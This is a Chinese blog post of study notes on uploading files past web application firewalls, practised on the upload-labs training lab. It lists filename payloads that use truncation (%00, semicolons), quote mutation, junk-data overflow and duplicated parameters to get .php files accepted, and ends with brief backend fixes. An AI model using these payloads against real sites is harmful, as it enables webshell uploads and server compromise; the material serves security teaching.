文件上传之waf绕过和安全维护

最新推荐文章于 2024-04-03 10:28:17 发布
最新推荐文章于 2024-04-03 10:28:17 发布
阅读量287 收藏 2
点赞数 2
分类专栏: WEB安全-文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119644210
版权

文件上传之waf绕过和安全维护

上传参数名解析

明确那些东西能修改?
Contont-Disposition:一般可更改
name:表单参数值,不能更改
Filename:文件名,上传的文件,可以更改
Content-Type:文件MIME,视情况更改,判断滤机制里面是不是通过这个这个属性值来过滤的
见upload-labs-master pass2

常见绕过方法

数据溢出-防匹配(xxx…)

也就是垃圾数据使得WAF无法匹配
在这里插入图片描述

符号变异-防匹配(’ " ; )

匹配’'以及""里面的内容,没匹配到,所以绕过
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

x.php;.jpg

数据截断-防匹配(%00 ;/换行)

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

重复数据-防匹配(参数多次)

在这里插入图片描述

fuzz

利用luzz字典绕过pass-3
在这里插入图片描述
在这里插入图片描述

payload

name="upload_file";垃圾数据 file_name="x.php"

file_name="dudu.php----由于没有"结尾,所以没找见结尾,可以上传,但是"放在前面就失效,X"x".php

"x.php;.php"   ""里面的都是上传的文件名,;表示已经截断了


filename=x.php
filename="x.php
filename='x.php
filename="a.jpg;.php";
filename="a.php%00.jpg"
filename="connect-disposition:from-data;
name="upload_file";x.php"
filename="x.jpg";filename="x.jpg";.....filename="x.php";

安全修复

后端进行验证,
后端验证:基于黑名单,白名单过滤
MIME基于上传自带类型检测
内容检测:文件头,完整性检测
后缀验证,参考upload-labs关卡黑名单的各种方式
getimage函数只能接受图片,只处理图片信息

安全狗,宝塔,云端

硫酸超
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
45-1 waf绕过 - 文件上传绕过WAF方法
weixin_43263566的博客
06-04 198
打开dvwa靶场,先将靶场的安全等级调低,然后切换到文件上传
第24天:WEB漏洞-文件上传WAF绕过安全修复1
08-03
Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件 MIME,视情
24 WEB漏洞-文件上传WAF绕过安全修复_阿里云waf绕过怎么修复
最新发布
logic1001的博客
04-03 670
我这个测试是没有必要的,这只是说大家以后碰到同类的防护软件,不管是安全狗还是宝塔,安全公司里面的产品,那么大家在研究的时候,也是这么个研究方法,大家不要自己绕过绕过了,我们学的是研究的方法后期只要脑瓜子灵活一点,是没有任何问题是可以绕过的,方法学不到,那讲了也是白讲,我希望大家学的是绕过的方法,以后自己就能做这个事情。.php,它的意义是很明显的,因为安全狗也是程序,当它碰到截断,也是会截断的,后面的.php就没有匹配到,最后上传的后缀是.php就行了。这是垃圾数据的一个典型情况,末尾是要加;
文件上传的一些简单绕过
qq_52469895的博客
04-10 1876
文件上传过宝塔WAF 0x00:写在前面 0x01:上传绕过后缀检测的姿势 方法1:文件名14.\np\nh\np绕过(如下0x02的方法1所示) 方法2:0a污染就能传php了(改hex) 0x02:绕过宝塔waf检测的文件内容书写 方法1:文件名14.\np\nh\np绕过,用个deskop.ini做一下污染 写马。 deskop.ini污染,就是类似windows dos窗口下制作图片🐎一样,二进制揉在一起。 POST /sandbox/i9pkda6liup7jd81u
文件上传之,waf绕过(24)
san3144393495的博客
05-20 1450
前期upload第二关的时候,判断的方式就是mime的类型的绕过绕过miem是图片类型就可以上传,没有验证后缀,这是代码的判断,我们在来探针一下防护软件是怎么判断的,现在第二关上传一个图片上去,抓住数据包,mime满足就可以上传,所以把上传的文件名字改成php格式,本来这是可以正常上传成功的。mime可以作为一个验证条件,验证mime来判断你个文件一个合法性的时候,可以通过更改mime来达到一个伪造,比如上传一个php文件,这时候可以更改为图片类来尝试绕过mime验证。
WAF绕过-漏洞利用之注入上传跨站等绕过
xhscxj的博客
02-22 1826
waf主要拦截的就是上图漏洞 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload Aliyun:基本修改指纹即可 宝塔:匹配关键字外加/*等 sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent #文件上传 1.php 截断 参考前面上传 waf 绕过 payload #XSS 跨站 利用 XSStrike 绕过 加上--tim.
文件上传wafwaf拦不住我)
weixin_44110366的博客
11-09 2163
一. 什么是文件上传漏洞 Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏 洞. 1:WTS-WAF 绕过上传 原内容: Content-Disposition: form-data; name=“up_picture”; filename=“xss.ph...
2022年文件上传漏洞绕过姿势整理,过waf
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
长亭waf绕过1.pdf
07-09
长亭waf绕过1
上传绕过WAF的15中姿势
06-29
绕过WAF进行文件上传的文旦,可以学习一些姿势加以利用。
【干货】记一次WAF对抗赛详解&全方位绕过WAF
热门推荐
Enweitech Software Works
07-02 1万+
0x01 preview 上个星期参加了某巨头厂商承办的挑战赛,比赛周期48小时,题目是成功渗透在安全宝保护下的五个通用cms靶场,其中包括论坛、商城、资源网站等 从靶场布置来看很明显是在测试安全宝对于几种不同类型cms的对攻击的防御能力。 这样的比赛模式区别于常见的CTF线上模式稍有不同,实战味道较强。常规的CTF在Web题目上面主要考察的是漏洞挖掘和利用,难点一般凸显在发现难和利
各种文件上传绕过的原理
weixin_46236101的博客
10-30 1280
WAF绕过 安全绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name=“file”; filename=“ian.php” 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name=“file”; filename=“yjh.php” Content-Type: application/octet
文件上传漏洞
qq_55894976的博客
04-01 161
上传带有后门的图片,然后找到图片的路径,对路径进行代码环境的执行,例如在图片url后+1.php执行php环境,(如果找不到路径可以通过搜索cms查看是否有文件上传漏洞)在通过PHP的相应函数(比如include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。造成重复数据的上传,看是否会被拦截。在后缀名后面加一个空格进行上传,绕过之后上传的文件会自动将空格去掉,例如在windows中创建一个后缀名带空格的文件,会自动去掉空格。
我的WafBypass之道(upload篇)
Master'Blog
12-03 2479
好文章,值得转载:https://xianzhi.aliyun.com/forum/read/458.html 0x00 前言 玩waf当然也要讲究循序渐进,姊妹篇就写文件上传好了,感觉也就SQLi和Xss的WafBypass最体现发散性思维的,而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪,所
常见6种WAF绕过和防护原理
07-08 1万+
关于上传绕过WAF的姿势!
上传绕过_上传绕过WAF姿势与防御漫谈
weixin_39963053的博客
11-25 428
*本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担今天就聊聊关于上传绕过WAF的姿势,WAF(Web Application Firewall)简单的来说就是执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。上传绕过不算什么技术了,正所谓未知防,焉知攻,先来了解一下网站的防御措施吧!一、上传绕过姿势1.一般开发人员防御策略客户端java...
上传绕过WAF几种常见的姿势
aiquan9342的博客
05-16 263
1:WTS-WAF 绕过上传原内容:Content-Disposition: form-data; name="up_picture"; filename="xss.php"添加回车Content-Disposition: form-data; name="up_picture"; filename="xss.php" 2:百度云上传绕过见下:百度云绕过就简单的很多很多,在对文件...
如何防止文件上传绕过WAF
05-20
要防止文件上传绕过WAF,可以采取以下措施: 1. 文件扩展名过滤:通过对上传文件的扩展名进行过滤,只允许上传指定类型的文件。同时,需要注意的是,黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤:WAF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值